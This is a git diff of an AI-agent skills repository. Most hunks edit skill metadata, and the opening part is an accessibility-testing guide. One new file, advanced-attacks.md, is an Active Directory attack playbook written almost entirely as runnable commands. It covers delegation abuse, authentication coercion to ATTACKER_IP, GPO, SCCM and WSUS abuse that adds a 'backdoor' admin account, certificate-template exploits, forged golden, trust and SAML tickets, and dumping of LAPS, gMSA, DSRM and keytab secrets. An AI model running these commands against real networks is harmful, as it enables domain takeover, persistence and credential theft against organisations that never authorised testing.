+ 'a[href], button, input, select, textarea, [tabindex]:not([tabindex="-1"])';
+ return Array.from(document.querySelectorAll(selector)).map((el) => ({
+ tagName: el.tagName.toLowerCase(),
+ text: el.innerText || el.value || el.placeholder || "",
+ tabIndex: el.tabIndex,
+ }));
+ });
+
+ results.focusableElements = focusable;
+
+ // Test tab order and focus indicators
+ for (let i = 0; i < focusable.length; i++) {
+ await page.keyboard.press("Tab");
+
+ const focused = await page.evaluate(() => {
+ const el = document.activeElement;
+ return {
+ tagName: el.tagName.toLowerCase(),
+ hasFocusIndicator: window.getComputedStyle(el).outline !== "none",
+ };
+ });
+
+ if (!focused.hasFocusIndicator) {
+ results.missingFocusIndicators.push(focused);
+ }
+ }
+
+ return results;
+ }
+}
+
+// Enhance keyboard accessibility
+document.addEventListener("keydown", (e) => {
+ if (e.key === "Escape") {
+ const modal = document.querySelector(".modal.open");
+ if (modal) closeModal(modal);
+ }
+});
+
+// Make div clickable accessible
+document.querySelectorAll("[onclick]").forEach((el) => {
+ if (!["a", "button", "input"].includes(el.tagName.toLowerCase())) {
+ el.setAttribute("tabindex", "0");
+ el.setAttribute("role", "button");
+ el.addEventListener("keydown", (e) => {
+ if (e.key === "Enter" || e.key === " ") {
+ el.click();
+ e.preventDefault();
+ }
+ });
+ }
+});
+```
+
+### 4. Screen Reader Testing
+
+```javascript
+// screen-reader-test.js
+class ScreenReaderTester {
+ async testScreenReaderCompatibility(page) {
+ return {
+ landmarks: await this.testLandmarks(page),
+ headings: await this.testHeadingStructure(page),
+ images: await this.testImageAccessibility(page),
+ forms: await this.testFormAccessibility(page),
+ };
+ }
+
+ async testHeadingStructure(page) {
+ const headings = await page.evaluate(() => {
+ return Array.from(
+ document.querySelectorAll("h1, h2, h3, h4, h5, h6"),
+ ).map((h) => ({
+ level: parseInt(h.tagName[1]),
+ text: h.textContent.trim(),
+ isEmpty: !h.textContent.trim(),
+ }));
+ });
+
+ const issues = [];
+ let previousLevel = 0;
+
+ headings.forEach((heading, index) => {
+ if (heading.level > previousLevel + 1 && previousLevel !== 0) {
+ issues.push({
+ type: "skipped-level",
+ message: `Heading level ${heading.level} skips from level ${previousLevel}`,
+ });
+ }
+ if (heading.isEmpty) {
+ issues.push({ type: "empty-heading", index });
+ }
+ previousLevel = heading.level;
+ });
+
+ if (!headings.some((h) => h.level === 1)) {
+ issues.push({ type: "missing-h1", message: "Page missing h1 element" });
+ }
+
+ return { headings, issues };
+ }
+
+ async testFormAccessibility(page) {
+ const forms = await page.evaluate(() => {
+ return Array.from(document.querySelectorAll("form")).map((form) => {
+ const inputs = form.querySelectorAll("input, textarea, select");
+ return {
+ fields: Array.from(inputs).map((input) => ({
+ type: input.type || input.tagName.toLowerCase(),
+ id: input.id,
+ hasLabel: input.id
+ ? !!document.querySelector(`label[for="${input.id}"]`)
+ : !!input.closest("label"),
+ hasAriaLabel: !!input.getAttribute("aria-label"),
+ required: input.required,
+ })),
+ };
+ });
+ });
+
+ const issues = [];
+ forms.forEach((form, i) => {
+ form.fields.forEach((field, j) => {
+ if (!field.hasLabel && !field.hasAriaLabel) {
+ issues.push({ type: "missing-label", form: i, field: j });
+ }
+ });
+ });
+
+ return { forms, issues };
+ }
+}
+
+// ARIA patterns
+const ariaPatterns = {
+ modal: `
+
+
Modal Title
+ ×
+`,
+
+ tabs: `
+
+ Tab 1
+
+Content
`,
+
+ form: `
+Name *
+
+ `,
+};
+```
+
+### 5. Manual Testing Checklist
+
+```markdown
+## Manual Accessibility Testing
+
+### Keyboard Navigation
+
+- [ ] All interactive elements accessible via Tab
+- [ ] Buttons activate with Enter/Space
+- [ ] Esc key closes modals
+- [ ] Focus indicator always visible
+- [ ] No keyboard traps
+- [ ] Logical tab order
+
+### Screen Reader
+
+- [ ] Page title descriptive
+- [ ] Headings create logical outline
+- [ ] Images have alt text
+- [ ] Form fields have labels
+- [ ] Error messages announced
+- [ ] Dynamic updates announced
+
+### Visual
+
+- [ ] Text resizes to 200% without loss
+- [ ] Color not sole means of info
+- [ ] Focus indicators have sufficient contrast
+- [ ] Content reflows at 320px
+- [ ] Animations can be paused
+
+### Cognitive
+
+- [ ] Instructions clear and simple
+- [ ] Error messages helpful
+- [ ] No time limits on forms
+- [ ] Navigation consistent
+- [ ] Important actions reversible
+```
+
+### 6. Remediation Examples
+
+```javascript
+// Fix missing alt text
+document.querySelectorAll("img:not([alt])").forEach((img) => {
+ const isDecorative =
+ img.role === "presentation" || img.closest('[role="presentation"]');
+ img.setAttribute("alt", isDecorative ? "" : img.title || "Image");
+});
+
+// Fix missing labels
+document
+ .querySelectorAll("input:not([aria-label]):not([id])")
+ .forEach((input) => {
+ if (input.placeholder) {
+ input.setAttribute("aria-label", input.placeholder);
+ }
+ });
+
+// React accessible components
+const AccessibleButton = ({ children, onClick, ariaLabel, ...props }) => (
+
+ {children}
+
+);
+
+const LiveRegion = ({ message, politeness = "polite" }) => (
+
+ {message}
+
+);
+```
+
+### 7. CI/CD Integration
+
+```yaml
+# .github/workflows/accessibility.yml
+name: Accessibility Tests
+
+on: [push, pull_request]
+
+jobs:
+ a11y-tests:
+ runs-on: ubuntu-latest
+
+ steps:
+ - uses: actions/checkout@v3
+
+ - name: Setup Node.js
+ uses: actions/setup-node@v3
+ with:
+ node-version: "18"
+
+ - name: Install and build
+ run: |
+ npm ci
+ npm run build
+
+ - name: Start server
+ run: |
+ npm start &
+ npx wait-on http://localhost:3000
+
+ - name: Run axe tests
+ run: npm run test:a11y
+
+ - name: Run pa11y
+ run: npx pa11y http://localhost:3000 --standard WCAG2AA --threshold 0
+
+ - name: Upload report
+ uses: actions/upload-artifact@v3
+ if: always()
+ with:
+ name: a11y-report
+ path: a11y-report.html
+```
+
+### 8. Reporting
+
+```javascript
+// report-generator.js
+class AccessibilityReportGenerator {
+ generateHTMLReport(auditResults) {
+ return `
+
+
+
+ Accessibility Audit
+
+
+
+ Accessibility Audit Report
+ Generated: ${new Date().toLocaleString()}
+
+
+
Summary
+
${auditResults.score}/100
+
Total Violations: ${auditResults.violations.length}
+
+
+ Violations
+ ${auditResults.violations
+ .map(
+ (v) => `
+
+
${v.help}
+
Impact: ${v.impact}
+
${v.description}
+
Learn more
+
+ `,
+ )
+ .join("")}
+
+`;
+ }
+}
+```
+
+## Output Format
+
+1. **Accessibility Score**: Overall compliance with WCAG levels
+2. **Violation Report**: Detailed issues with severity and fixes
+3. **Test Results**: Automated and manual test outcomes
+4. **Remediation Guide**: Step-by-step fixes for each issue
+5. **Code Examples**: Accessible component implementations
+
+Focus on creating inclusive experiences that work for all users, regardless of their abilities or assistive technologies.
diff --git a/web-app/public/skills/active-directory-attacks/SKILL.md b/web-app/public/skills/active-directory-attacks/SKILL.md
index 10ffb5fa..12330c54 100644
--- a/web-app/public/skills/active-directory-attacks/SKILL.md
+++ b/web-app/public/skills/active-directory-attacks/SKILL.md
@@ -1,11 +1,9 @@
---
name: active-directory-attacks
description: "This skill should be used when the user asks to \"attack Active Directory\", \"exploit AD\", \"Kerberoasting\", \"DCSync\", \"pass-the-hash\", \"BloodHound enumeration\", \"Golden Ticket\", ..."
-metadata:
- author: zebbern
- version: "1.1"
risk: unknown
source: community
+date_added: "2026-02-27"
---
# Active Directory Attacks
diff --git a/web-app/public/skills/active-directory-attacks/references/advanced-attacks.md b/web-app/public/skills/active-directory-attacks/references/advanced-attacks.md
new file mode 100644
index 00000000..2428ecf0
--- /dev/null
+++ b/web-app/public/skills/active-directory-attacks/references/advanced-attacks.md
@@ -0,0 +1,382 @@
+# Advanced Active Directory Attacks Reference
+
+## Table of Contents
+1. [Delegation Attacks](#delegation-attacks)
+2. [Group Policy Object Abuse](#group-policy-object-abuse)
+3. [RODC Attacks](#rodc-attacks)
+4. [SCCM/WSUS Deployment](#sccmwsus-deployment)
+5. [AD Certificate Services (ADCS)](#ad-certificate-services-adcs)
+6. [Trust Relationship Attacks](#trust-relationship-attacks)
+7. [ADFS Golden SAML](#adfs-golden-saml)
+8. [Credential Sources](#credential-sources)
+9. [Linux AD Integration](#linux-ad-integration)
+
+---
+
+## Delegation Attacks
+
+### Unconstrained Delegation
+
+When a user authenticates to a computer with unconstrained delegation, their TGT is saved to memory.
+
+**Find Delegation:**
+```powershell
+# PowerShell
+Get-ADComputer -Filter {TrustedForDelegation -eq $True}
+
+# BloodHound
+MATCH (c:Computer {unconstraineddelegation:true}) RETURN c
+```
+
+**SpoolService Abuse:**
+```bash
+# Check spooler service
+ls \\dc01\pipe\spoolss
+
+# Trigger with SpoolSample
+.\SpoolSample.exe DC01.domain.local HELPDESK.domain.local
+
+# Or with printerbug.py
+python3 printerbug.py 'domain/user:pass'@DC01 ATTACKER_IP
+```
+
+**Monitor with Rubeus:**
+```powershell
+Rubeus.exe monitor /interval:1
+```
+
+### Constrained Delegation
+
+**Identify:**
+```powershell
+Get-DomainComputer -TrustedToAuth | select -exp msds-AllowedToDelegateTo
+```
+
+**Exploit with Rubeus:**
+```powershell
+# S4U2 attack
+Rubeus.exe s4u /user:svc_account /rc4:HASH /impersonateuser:Administrator /msdsspn:cifs/target.domain.local /ptt
+```
+
+**Exploit with Impacket:**
+```bash
+getST.py -spn HOST/target.domain.local 'domain/user:password' -impersonate Administrator -dc-ip DC_IP
+```
+
+### Resource-Based Constrained Delegation (RBCD)
+
+```powershell
+# Create machine account
+New-MachineAccount -MachineAccount AttackerPC -Password $(ConvertTo-SecureString 'Password123' -AsPlainText -Force)
+
+# Set delegation
+Set-ADComputer target -PrincipalsAllowedToDelegateToAccount AttackerPC$
+
+# Get ticket
+.\Rubeus.exe s4u /user:AttackerPC$ /rc4:HASH /impersonateuser:Administrator /msdsspn:cifs/target.domain.local /ptt
+```
+
+---
+
+## Group Policy Object Abuse
+
+### Find Vulnerable GPOs
+
+```powershell
+Get-DomainObjectAcl -Identity "SuperSecureGPO" -ResolveGUIDs | Where-Object {($_.ActiveDirectoryRights.ToString() -match "GenericWrite|WriteDacl|WriteOwner")}
+```
+
+### Abuse with SharpGPOAbuse
+
+```powershell
+# Add local admin
+.\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount attacker --GPOName "Vulnerable GPO"
+
+# Add user rights
+.\SharpGPOAbuse.exe --AddUserRights --UserRights "SeTakeOwnershipPrivilege,SeRemoteInteractiveLogonRight" --UserAccount attacker --GPOName "Vulnerable GPO"
+
+# Add immediate task
+.\SharpGPOAbuse.exe --AddComputerTask --TaskName "Update" --Author DOMAIN\Admin --Command "cmd.exe" --Arguments "/c net user backdoor Password123! /add" --GPOName "Vulnerable GPO"
+```
+
+### Abuse with pyGPOAbuse (Linux)
+
+```bash
+./pygpoabuse.py DOMAIN/user -hashes lm:nt -gpo-id "12345677-ABCD-9876-ABCD-123456789012"
+```
+
+---
+
+## RODC Attacks
+
+### RODC Golden Ticket
+
+RODCs contain filtered AD copy (excludes LAPS/Bitlocker keys). Forge tickets for principals in msDS-RevealOnDemandGroup.
+
+### RODC Key List Attack
+
+**Requirements:**
+- krbtgt credentials of the RODC (-rodcKey)
+- ID of the krbtgt account of the RODC (-rodcNo)
+
+```bash
+# Impacket keylistattack
+keylistattack.py DOMAIN/user:password@host -rodcNo XXXXX -rodcKey XXXXXXXXXXXXXXXXXXXX -full
+
+# Using secretsdump with keylist
+secretsdump.py DOMAIN/user:password@host -rodcNo XXXXX -rodcKey XXXXXXXXXXXXXXXXXXXX -use-keylist
+```
+
+**Using Rubeus:**
+```powershell
+Rubeus.exe golden /rodcNumber:25078 /aes256:RODC_AES256_KEY /user:Administrator /id:500 /domain:domain.local /sid:S-1-5-21-xxx
+```
+
+---
+
+## SCCM/WSUS Deployment
+
+### SCCM Attack with MalSCCM
+
+```bash
+# Locate SCCM server
+MalSCCM.exe locate
+
+# Enumerate targets
+MalSCCM.exe inspect /all
+MalSCCM.exe inspect /computers
+
+# Create target group
+MalSCCM.exe group /create /groupname:TargetGroup /grouptype:device
+MalSCCM.exe group /addhost /groupname:TargetGroup /host:TARGET-PC
+
+# Create malicious app
+MalSCCM.exe app /create /name:backdoor /uncpath:"\\SCCM\SCCMContentLib$\evil.exe"
+
+# Deploy
+MalSCCM.exe app /deploy /name:backdoor /groupname:TargetGroup /assignmentname:update
+
+# Force checkin
+MalSCCM.exe checkin /groupname:TargetGroup
+
+# Cleanup
+MalSCCM.exe app /cleanup /name:backdoor
+MalSCCM.exe group /delete /groupname:TargetGroup
+```
+
+### SCCM Network Access Accounts
+
+```powershell
+# Find SCCM blob
+Get-Wmiobject -namespace "root\ccm\policy\Machine\ActualConfig" -class "CCM_NetworkAccessAccount"
+
+# Decrypt with SharpSCCM
+.\SharpSCCM.exe get naa -u USERNAME -p PASSWORD
+```
+
+### WSUS Deployment Attack
+
+```bash
+# Using SharpWSUS
+SharpWSUS.exe locate
+SharpWSUS.exe inspect
+
+# Create malicious update
+SharpWSUS.exe create /payload:"C:\psexec.exe" /args:"-accepteula -s -d cmd.exe /c \"net user backdoor Password123! /add\"" /title:"Critical Update"
+
+# Deploy to target
+SharpWSUS.exe approve /updateid:GUID /computername:TARGET.domain.local /groupname:"Demo Group"
+
+# Check status
+SharpWSUS.exe check /updateid:GUID /computername:TARGET.domain.local
+
+# Cleanup
+SharpWSUS.exe delete /updateid:GUID /computername:TARGET.domain.local /groupname:"Demo Group"
+```
+
+---
+
+## AD Certificate Services (ADCS)
+
+### ESC1 - Misconfigured Templates
+
+Template allows ENROLLEE_SUPPLIES_SUBJECT with Client Authentication EKU.
+
+```bash
+# Find vulnerable templates
+certipy find -u user@domain.local -p password -dc-ip DC_IP -vulnerable
+
+# Request certificate as admin
+certipy req -u user@domain.local -p password -ca CA-NAME -target ca.domain.local -template VulnTemplate -upn administrator@domain.local
+
+# Authenticate
+certipy auth -pfx administrator.pfx -dc-ip DC_IP
+```
+
+### ESC4 - ACL Vulnerabilities
+
+```python
+# Check for WriteProperty
+python3 modifyCertTemplate.py domain.local/user -k -no-pass -template user -dc-ip DC_IP -get-acl
+
+# Add ENROLLEE_SUPPLIES_SUBJECT flag
+python3 modifyCertTemplate.py domain.local/user -k -no-pass -template user -dc-ip DC_IP -add CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT
+
+# Perform ESC1, then restore
+python3 modifyCertTemplate.py domain.local/user -k -no-pass -template user -dc-ip DC_IP -value 0 -property mspki-Certificate-Name-Flag
+```
+
+### ESC8 - NTLM Relay to Web Enrollment
+
+```bash
+# Start relay
+ntlmrelayx.py -t http://ca.domain.local/certsrv/certfnsh.asp -smb2support --adcs --template DomainController
+
+# Coerce authentication
+python3 petitpotam.py ATTACKER_IP DC_IP
+
+# Use certificate
+Rubeus.exe asktgt /user:DC$ /certificate:BASE64_CERT /ptt
+```
+
+### Shadow Credentials
+
+```bash
+# Add Key Credential (pyWhisker)
+python3 pywhisker.py -d "domain.local" -u "user1" -p "password" --target "TARGET" --action add
+
+# Get TGT with PKINIT
+python3 gettgtpkinit.py -cert-pfx "cert.pfx" -pfx-pass "password" "domain.local/TARGET" target.ccache
+
+# Get NT hash
+export KRB5CCNAME=target.ccache
+python3 getnthash.py -key 'AS-REP_KEY' domain.local/TARGET
+```
+
+---
+
+## Trust Relationship Attacks
+
+### Child to Parent Domain (SID History)
+
+```powershell
+# Get Enterprise Admins SID from parent
+$ParentSID = "S-1-5-21-PARENT-DOMAIN-SID-519"
+
+# Create Golden Ticket with SID History
+kerberos::golden /user:Administrator /domain:child.parent.local /sid:S-1-5-21-CHILD-SID /krbtgt:KRBTGT_HASH /sids:$ParentSID /ptt
+```
+
+### Forest to Forest (Trust Ticket)
+
+```bash
+# Dump trust key
+lsadump::trust /patch
+
+# Forge inter-realm TGT
+kerberos::golden /domain:domain.local /sid:S-1-5-21-xxx /rc4:TRUST_KEY /user:Administrator /service:krbtgt /target:external.com /ticket:trust.kirbi
+
+# Use trust ticket
+.\Rubeus.exe asktgs /ticket:trust.kirbi /service:cifs/target.external.com /dc:dc.external.com /ptt
+```
+
+---
+
+## ADFS Golden SAML
+
+**Requirements:**
+- ADFS service account access
+- Token signing certificate (PFX + decryption password)
+
+```bash
+# Dump with ADFSDump
+.\ADFSDump.exe
+
+# Forge SAML token
+python ADFSpoof.py -b EncryptedPfx.bin DkmKey.bin -s adfs.domain.local saml2 --endpoint https://target/saml --nameid administrator@domain.local
+```
+
+---
+
+## Credential Sources
+
+### LAPS Password
+
+```powershell
+# PowerShell
+Get-ADComputer -filter {ms-mcs-admpwdexpirationtime -like '*'} -prop 'ms-mcs-admpwd','ms-mcs-admpwdexpirationtime'
+
+# CrackMapExec
+crackmapexec ldap DC_IP -u user -p password -M laps
+```
+
+### GMSA Password
+
+```powershell
+# PowerShell + DSInternals
+$gmsa = Get-ADServiceAccount -Identity 'SVC_ACCOUNT' -Properties 'msDS-ManagedPassword'
+$mp = $gmsa.'msDS-ManagedPassword'
+ConvertFrom-ADManagedPasswordBlob $mp
+```
+
+```bash
+# Linux with bloodyAD
+python bloodyAD.py -u user -p password --host DC_IP getObjectAttributes gmsaAccount$ msDS-ManagedPassword
+```
+
+### Group Policy Preferences (GPP)
+
+```bash
+# Find in SYSVOL
+findstr /S /I cpassword \\domain.local\sysvol\domain.local\policies\*.xml
+
+# Decrypt
+python3 Get-GPPPassword.py -no-pass 'DC_IP'
+```
+
+### DSRM Credentials
+
+```powershell
+# Dump DSRM hash
+Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"'
+
+# Enable DSRM admin logon
+Set-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior -value 2
+```
+
+---
+
+## Linux AD Integration
+
+### CCACHE Ticket Reuse
+
+```bash
+# Find tickets
+ls /tmp/ | grep krb5cc
+
+# Use ticket
+export KRB5CCNAME=/tmp/krb5cc_1000
+```
+
+### Extract from Keytab
+
+```bash
+# List keys
+klist -k /etc/krb5.keytab
+
+# Extract with KeyTabExtract
+python3 keytabextract.py /etc/krb5.keytab
+```
+
+### Extract from SSSD
+
+```bash
+# Database location
+/var/lib/sss/secrets/secrets.ldb
+
+# Key location
+/var/lib/sss/secrets/.secrets.mkey
+
+# Extract
+python3 SSSDKCMExtractor.py --database secrets.ldb --key secrets.mkey
+```
diff --git a/web-app/public/skills/activecampaign-automation/SKILL.md b/web-app/public/skills/activecampaign-automation/SKILL.md
index f2f447c7..a3c6d2cb 100644
--- a/web-app/public/skills/activecampaign-automation/SKILL.md
+++ b/web-app/public/skills/activecampaign-automation/SKILL.md
@@ -1,10 +1,9 @@
---
name: activecampaign-automation
description: "Automate ActiveCampaign tasks via Rube MCP (Composio): manage contacts, tags, list subscriptions, automation enrollment, and tasks. Always search tools first for current schemas."
-requires:
- mcp: [rube]
risk: unknown
source: community
+date_added: "2026-02-27"
---
# ActiveCampaign Automation via Rube MCP
diff --git a/web-app/public/skills/address-github-comments/SKILL.md b/web-app/public/skills/address-github-comments/SKILL.md
index 39abb26b..f65e6724 100644
--- a/web-app/public/skills/address-github-comments/SKILL.md
+++ b/web-app/public/skills/address-github-comments/SKILL.md
@@ -3,6 +3,7 @@ name: address-github-comments
description: "Use when you need to address review or issue comments on an open GitHub Pull Request using the gh CLI."
risk: unknown
source: community
+date_added: "2026-02-27"
---
# Address GitHub Comments
diff --git a/web-app/public/skills/agent-evaluation/SKILL.md b/web-app/public/skills/agent-evaluation/SKILL.md
index d0329bb3..36a97c1f 100644
--- a/web-app/public/skills/agent-evaluation/SKILL.md
+++ b/web-app/public/skills/agent-evaluation/SKILL.md
@@ -1,8 +1,9 @@
---
name: agent-evaluation
description: "Testing and benchmarking LLM agents including behavioral testing, capability assessment, reliability metrics, and production monitoring\u2014where even top agents achieve less than 50% on re..."
-source: vibeship-spawner-skills (Apache 2.0)
risk: unknown
+source: "vibeship-spawner-skills (Apache 2.0)"
+date_added: "2026-02-27"
---
# Agent Evaluation
diff --git a/web-app/public/skills/agent-framework-azure-ai-py/SKILL.md b/web-app/public/skills/agent-framework-azure-ai-py/SKILL.md
index a4a0ddb0..6407dea3 100644
--- a/web-app/public/skills/agent-framework-azure-ai-py/SKILL.md
+++ b/web-app/public/skills/agent-framework-azure-ai-py/SKILL.md
@@ -1,9 +1,9 @@
---
name: agent-framework-azure-ai-py
description: "Build Azure AI Foundry agents using the Microsoft Agent Framework Python SDK (agent-framework-azure-ai). Use when creating persistent agents with AzureAIAgentsProvider, using hosted tools (code int..."
-package: agent-framework-azure-ai
risk: unknown
source: community
+date_added: "2026-02-27"
---
# Agent Framework Azure Hosted Agents
diff --git a/web-app/public/skills/agent-manager-skill/SKILL.md b/web-app/public/skills/agent-manager-skill/SKILL.md
index 2df4b9cc..f898fca1 100644
--- a/web-app/public/skills/agent-manager-skill/SKILL.md
+++ b/web-app/public/skills/agent-manager-skill/SKILL.md
@@ -3,6 +3,7 @@ name: agent-manager-skill
description: "Manage multiple local CLI agents via tmux sessions (start/stop/monitor/assign) with cron-friendly scheduling."
risk: unknown
source: community
+date_added: "2026-02-27"
---
# Agent Manager Skill
diff --git a/web-app/public/skills/agent-memory-mcp/SKILL.md b/web-app/public/skills/agent-memory-mcp/SKILL.md
index 24964e98..224a5095 100644
--- a/web-app/public/skills/agent-memory-mcp/SKILL.md
+++ b/web-app/public/skills/agent-memory-mcp/SKILL.md
@@ -1,9 +1,9 @@
---
name: agent-memory-mcp
-author: Amit Rathiesh
description: "A hybrid memory system that provides persistent, searchable knowledge management for AI agents (Architecture, Patterns, Decisions)."
risk: unknown
source: community
+date_added: "2026-02-27"
---
# Agent Memory Skill
diff --git a/web-app/public/skills/agent-memory-systems/SKILL.md b/web-app/public/skills/agent-memory-systems/SKILL.md
index c9580e0b..0d6e1e2a 100644
--- a/web-app/public/skills/agent-memory-systems/SKILL.md
+++ b/web-app/public/skills/agent-memory-systems/SKILL.md
@@ -1,8 +1,9 @@
---
name: agent-memory-systems
description: "Memory is the cornerstone of intelligent agents. Without it, every interaction starts from zero. This skill covers the architecture of agent memory: short-term (context window), long-term (vector s..."
-source: vibeship-spawner-skills (Apache 2.0)
risk: unknown
+source: "vibeship-spawner-skills (Apache 2.0)"
+date_added: "2026-02-27"
---
# Agent Memory Systems
diff --git a/web-app/public/skills/agent-orchestration-improve-agent/SKILL.md b/web-app/public/skills/agent-orchestration-improve-agent/SKILL.md
index 2ed4aacd..b7eb4207 100644
--- a/web-app/public/skills/agent-orchestration-improve-agent/SKILL.md
+++ b/web-app/public/skills/agent-orchestration-improve-agent/SKILL.md
@@ -3,6 +3,7 @@ name: agent-orchestration-improve-agent
description: "Systematic improvement of existing agents through performance analysis, prompt engineering, and continuous iteration."
risk: unknown
source: community
+date_added: "2026-02-27"
---
# Agent Performance Optimization Workflow
diff --git a/web-app/public/skills/agent-orchestration-multi-agent-optimize/SKILL.md b/web-app/public/skills/agent-orchestration-multi-agent-optimize/SKILL.md
index 6bb75c78..bd4e5184 100644
--- a/web-app/public/skills/agent-orchestration-multi-agent-optimize/SKILL.md
+++ b/web-app/public/skills/agent-orchestration-multi-agent-optimize/SKILL.md
@@ -3,6 +3,7 @@ name: agent-orchestration-multi-agent-optimize
description: "Optimize multi-agent systems with coordinated profiling, workload distribution, and cost-aware orchestration. Use when improving agent performance, throughput, or reliability."
risk: unknown
source: community
+date_added: "2026-02-27"
---
# Multi-Agent Optimization Toolkit
diff --git a/web-app/public/skills/agent-tool-builder/SKILL.md b/web-app/public/skills/agent-tool-builder/SKILL.md
index 473e17ae..06f5a08e 100644
--- a/web-app/public/skills/agent-tool-builder/SKILL.md
+++ b/web-app/public/skills/agent-tool-builder/SKILL.md
@@ -1,8 +1,9 @@
---
name: agent-tool-builder
description: "Tools are how AI agents interact with the world. A well-designed tool is the difference between an agent that works and one that hallucinates, fails silently, or costs 10x more tokens than necessar..."
-source: vibeship-spawner-skills (Apache 2.0)
risk: unknown
+source: "vibeship-spawner-skills (Apache 2.0)"
+date_added: "2026-02-27"
---
# Agent Tool Builder
diff --git a/web-app/public/skills/agentfolio/SKILL.md b/web-app/public/skills/agentfolio/SKILL.md
index 3c6b8702..088e63fc 100644
--- a/web-app/public/skills/agentfolio/SKILL.md
+++ b/web-app/public/skills/agentfolio/SKILL.md
@@ -1,8 +1,9 @@
---
name: agentfolio
description: "Skill for discovering and researching autonomous AI agents, tools, and ecosystems using the AgentFolio directory."
-source: agentfolio.io
risk: unknown
+source: agentfolio.io
+date_added: "2026-02-27"
---
# AgentFolio
diff --git a/web-app/public/skills/agents-v2-py/SKILL.md b/web-app/public/skills/agents-v2-py/SKILL.md
index c7879aad..aec4c021 100644
--- a/web-app/public/skills/agents-v2-py/SKILL.md
+++ b/web-app/public/skills/agents-v2-py/SKILL.md
@@ -1,9 +1,9 @@
---
name: agents-v2-py
description: "Build container-based Foundry Agents with Azure AI Projects SDK (ImageBasedHostedAgentDefinition). Use when creating hosted agents with custom container images in Azure AI Foundry."
-package: azure-ai-projects
risk: unknown
source: community
+date_added: "2026-02-27"
---
# Azure AI Hosted Agents (Python)
diff --git a/web-app/public/skills/ai-agent-development/SKILL.md b/web-app/public/skills/ai-agent-development/SKILL.md
index b0086e2b..2a084aa8 100644
--- a/web-app/public/skills/ai-agent-development/SKILL.md
+++ b/web-app/public/skills/ai-agent-development/SKILL.md
@@ -1,11 +1,10 @@
---
name: ai-agent-development
description: "AI agent development workflow for building autonomous agents, multi-agent systems, and agent orchestration with CrewAI, LangGraph, and custom agents."
-source: personal
-risk: safe
-domain: ai-ml
category: granular-workflow-bundle
-version: 1.0.0
+risk: safe
+source: personal
+date_added: "2026-02-27"
---
# AI Agent Development Workflow
diff --git a/web-app/public/skills/ai-agents-architect/SKILL.md b/web-app/public/skills/ai-agents-architect/SKILL.md
index c9a637b6..ee7dbfba 100644
--- a/web-app/public/skills/ai-agents-architect/SKILL.md
+++ b/web-app/public/skills/ai-agents-architect/SKILL.md
@@ -1,8 +1,9 @@
---
name: ai-agents-architect
description: "Expert in designing and building autonomous AI agents. Masters tool use, memory systems, planning strategies, and multi-agent orchestration. Use when: build agent, AI agent, autonomous agent, tool ..."
-source: vibeship-spawner-skills (Apache 2.0)
risk: unknown
+source: "vibeship-spawner-skills (Apache 2.0)"
+date_added: "2026-02-27"
---
# AI Agents Architect
diff --git a/web-app/public/skills/ai-engineer/SKILL.md b/web-app/public/skills/ai-engineer/SKILL.md
index ce392e7e..a75993a7 100644
--- a/web-app/public/skills/ai-engineer/SKILL.md
+++ b/web-app/public/skills/ai-engineer/SKILL.md
@@ -1,14 +1,9 @@
---
name: ai-engineer
-description: |
- Build production-ready LLM applications, advanced RAG systems, and
- intelligent agents. Implements vector search, multimodal AI, agent
- orchestration, and enterprise AI integrations. Use PROACTIVELY for LLM
- features, chatbots, AI agents, or AI-powered applications.
-metadata:
- model: inherit
+description: Build production-ready LLM applications, advanced RAG systems, and intelligent agents. Implements vector search, multimodal AI, agent orchestration, and enterprise AI integrations.
risk: unknown
source: community
+date_added: '2026-02-27'
---
You are an AI engineer specializing in production-grade LLM applications, generative AI systems, and intelligent agent architectures.
diff --git a/web-app/public/skills/ai-ml/SKILL.md b/web-app/public/skills/ai-ml/SKILL.md
index 350681e5..5c6aeb3d 100644
--- a/web-app/public/skills/ai-ml/SKILL.md
+++ b/web-app/public/skills/ai-ml/SKILL.md
@@ -1,11 +1,10 @@
---
name: ai-ml
description: "AI and machine learning workflow covering LLM application development, RAG implementation, agent architecture, ML pipelines, and AI-powered features."
-source: personal
-risk: safe
-domain: artificial-intelligence
category: workflow-bundle
-version: 1.0.0
+risk: safe
+source: personal
+date_added: "2026-02-27"
---
# AI/ML Workflow Bundle
diff --git a/web-app/public/skills/ai-product/SKILL.md b/web-app/public/skills/ai-product/SKILL.md
index 5120c9b4..cc1c7d41 100644
--- a/web-app/public/skills/ai-product/SKILL.md
+++ b/web-app/public/skills/ai-product/SKILL.md
@@ -1,8 +1,9 @@
---
name: ai-product
-description: "Every product will be AI-powered. The question is whether you'll build it right or ship a demo that falls apart in production. This skill covers LLM integration patterns, RAG architecture, prompt ..."
-source: vibeship-spawner-skills (Apache 2.0)
+description: Every product will be AI-powered. The question is whether you'll build it right or ship a demo that falls apart in production. This skill covers LLM integration patterns, RAG architecture, prompt ...
risk: unknown
+source: vibeship-spawner-skills (Apache 2.0)
+date_added: '2026-02-27'
---
# AI Product Development
diff --git a/web-app/public/skills/ai-wrapper-product/SKILL.md b/web-app/public/skills/ai-wrapper-product/SKILL.md
index fa317f5a..33f5c5cd 100644
--- a/web-app/public/skills/ai-wrapper-product/SKILL.md
+++ b/web-app/public/skills/ai-wrapper-product/SKILL.md
@@ -1,8 +1,9 @@
---
name: ai-wrapper-product
description: "Expert in building products that wrap AI APIs (OpenAI, Anthropic, etc.) into focused tools people will pay for. Not just 'ChatGPT but different' - products that solve specific problems with AI. Cov..."
-source: vibeship-spawner-skills (Apache 2.0)
risk: unknown
+source: "vibeship-spawner-skills (Apache 2.0)"
+date_added: "2026-02-27"
---
# AI Wrapper Product
diff --git a/web-app/public/skills/airflow-dag-patterns/SKILL.md b/web-app/public/skills/airflow-dag-patterns/SKILL.md
index 4017e79f..4e285a72 100644
--- a/web-app/public/skills/airflow-dag-patterns/SKILL.md
+++ b/web-app/public/skills/airflow-dag-patterns/SKILL.md
@@ -3,6 +3,7 @@ name: airflow-dag-patterns
description: "Build production Apache Airflow DAGs with best practices for operators, sensors, testing, and deployment. Use when creating data pipelines, orchestrating workflows, or scheduling batch jobs."
risk: unknown
source: community
+date_added: "2026-02-27"
---
# Apache Airflow DAG Patterns
diff --git a/web-app/public/skills/airflow-dag-patterns/resources/implementation-playbook.md b/web-app/public/skills/airflow-dag-patterns/resources/implementation-playbook.md
new file mode 100644
index 00000000..f70daa35
--- /dev/null
